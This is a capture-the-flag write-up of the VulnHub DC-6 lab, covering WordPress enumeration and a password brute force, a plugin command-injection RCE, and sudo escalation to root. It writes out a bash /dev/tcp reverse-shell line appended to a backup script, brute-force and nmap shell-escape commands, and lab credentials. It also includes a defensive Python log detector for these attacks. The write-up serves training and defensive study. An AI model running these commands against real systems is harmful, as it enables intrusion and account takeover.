DC-6 starts off by enumerating usernames from a WordPress website. I'm able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP plugin which can be leveraged to gain a foothold on the system. A to-do note containing a user's credentials is discovered while enumerating the home directory. For the root part, there are sudo privileges on a writable backup script and on nmap, which allow me to escalate to another user and then straight to root.
Reconnaissance
Host Discovery — arpscan
Because 192.168.2.1 and 192.168.2.2 are virtual gateway addresses, the target machine's IP address is most likely 192.168.2.104.
arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
Nmap
With the initial scan, nmap shows two ports open: SSH on port 22 and an Apache web server on port 80.
nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
From the results above, there's a redirection to http://wordy/ on port 80. To resolve that hostname, I'll add wordy to my /etc/hosts file.
echo '192.168.2.104 wordy' >> /etc/hosts
TCP 80 — Website
This page clearly states that it’s a WordPress site.
Nothing interesting to explore here, but the text "secure plugins" seems to be a hint from the machine's author.
— :: Nmap NSE
Running the nmap http-wordpress* scripts against this website finds several usernames.
nmap -p 80 --script "http-wordpress*" wordy
I'll save those usernames into a file called users.
— :: WPScan
wpscan identifies two vulnerable WP plugins: one with an RCE and one with a user-role privilege escalation.
wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
I'm interested in the RCE one, but before that I'll have to find creds.
Brute-forcing passwords
At that time, I was stuck for a couple of hours. I asked for a nudge and the answer was to brute force; I didn't know that the box's author had actually given us a hint to create a custom wordlist from rockyou.txt.
I'll create a new wordlist from rockyou.txt and then use it to perform a brute-force attack with wpscan.
wpscan --url http://wordy/ --usernames users --passwords passwords.txt
It returns one valid set of credentials: mark:helpdesk10.
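Both steps above, the author-ID user enumeration and the wp-login brute force, leave a distinctive trace in the web server's access log. As an added example (not part of the original write-up), this Python script flags both patterns over a constructed Apache combined-format log; the client IPs, timestamps and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Minimal matcher for Apache "combined" access-log lines (only the fields used here).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev

def detect(lines, login_threshold=10, author_threshold=5, window=timedelta(minutes=5)):
    """Return sorted (ip, reason) findings for author-ID enumeration and login brute force."""
    failed_logins = defaultdict(list)  # ip -> timestamps of failed wp-login.php POSTs
    author_ids = defaultdict(set)      # ip -> distinct ?author=N values requested
    findings = set()
    for ev in filter(None, map(parse, lines)):
        ip, path = ev["ip"], ev["path"]
        # WordPress re-renders the form with HTTP 200 on a failed login and answers a
        # successful one with a 302 redirect, so the 200 responses are the failures.
        if ev["method"] == "POST" and path.startswith("/wp-login.php") and ev["status"] == 200:
            recent = [t for t in failed_logins[ip] if ev["ts"] - t <= window] + [ev["ts"]]
            failed_logins[ip] = recent
            if len(recent) >= login_threshold:
                findings.add((ip, "wp-login brute force"))
        m = re.search(r"[?&]author=(\d+)", path)
        if m:
            author_ids[ip].add(int(m.group(1)))
            if len(author_ids[ip]) >= author_threshold:
                findings.add((ip, "author-id user enumeration"))
    return sorted(findings)

# Constructed sample log (not captured from the box): 10.0.0.5 walks ?author=1..6 and
# then fails 12 logins within a minute; 10.0.0.9 logs in once, successfully (302).
SAMPLE = (
    [f'10.0.0.5 - - [01/Jan/2024:10:00:{i:02d} +0000] "GET /?author={i} HTTP/1.1" 301 0'
     for i in range(1, 7)]
    + [f'10.0.0.5 - - [01/Jan/2024:10:01:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4321'
       for i in range(12)]
    + ['10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0']
)
```

Calling detect(SAMPLE) reports 10.0.0.5 for both patterns and nothing for 10.0.0.9; on a real server, feed it the lines of the Apache access log instead of SAMPLE.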
Foothold
Plainview Activity Monitor — RCE (CVE-2018-15877)
With the credentials I obtained, I can log in to the WP dashboard.
Based on the previous wpscan output, I searched for an exploit PoC for the Plainview Activity Monitor RCE and found this one on exploit-db.
The PoC exploits a vulnerability in the plugin's IP tools feature.
I'll hit the lookup button and intercept the request in Burp.
RCE can be achieved by adding a set of OS commands after a command pipe |, a semicolon ; (stacked command), or a logical OR || in the ip field. In this case, I send a reverse shell.
Privilege Escalation
Internal enumeration
The home directory is readable by www-data and there are two interesting files: backups.sh and things-to-do.txt.
I immediately checked the contents of backups.sh and things-to-do.txt.
The backups.sh script is writable by the devs group, and I'll note that.
And things-to-do.txt contains graham's credentials.
SSH — Graham
I tried graham's creds, graham:GSo7isUM1D4, on SSH, and it worked.
Shell as jens via sudo backups.sh
User graham has sudo privileges on the backups.sh script, and this allows me to run the script as user jens.
Because the script is also writable by graham (devs group), I can exploit this to escalate to jens by appending a reverse shell line to the script and then running it with sudo.
graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Shell as root via sudo nmap
I found out that user jens is allowed to execute nmap as the root user.
I can exploit this as well, using the reference from GTFOBins.
jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
And here is the flag:
Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/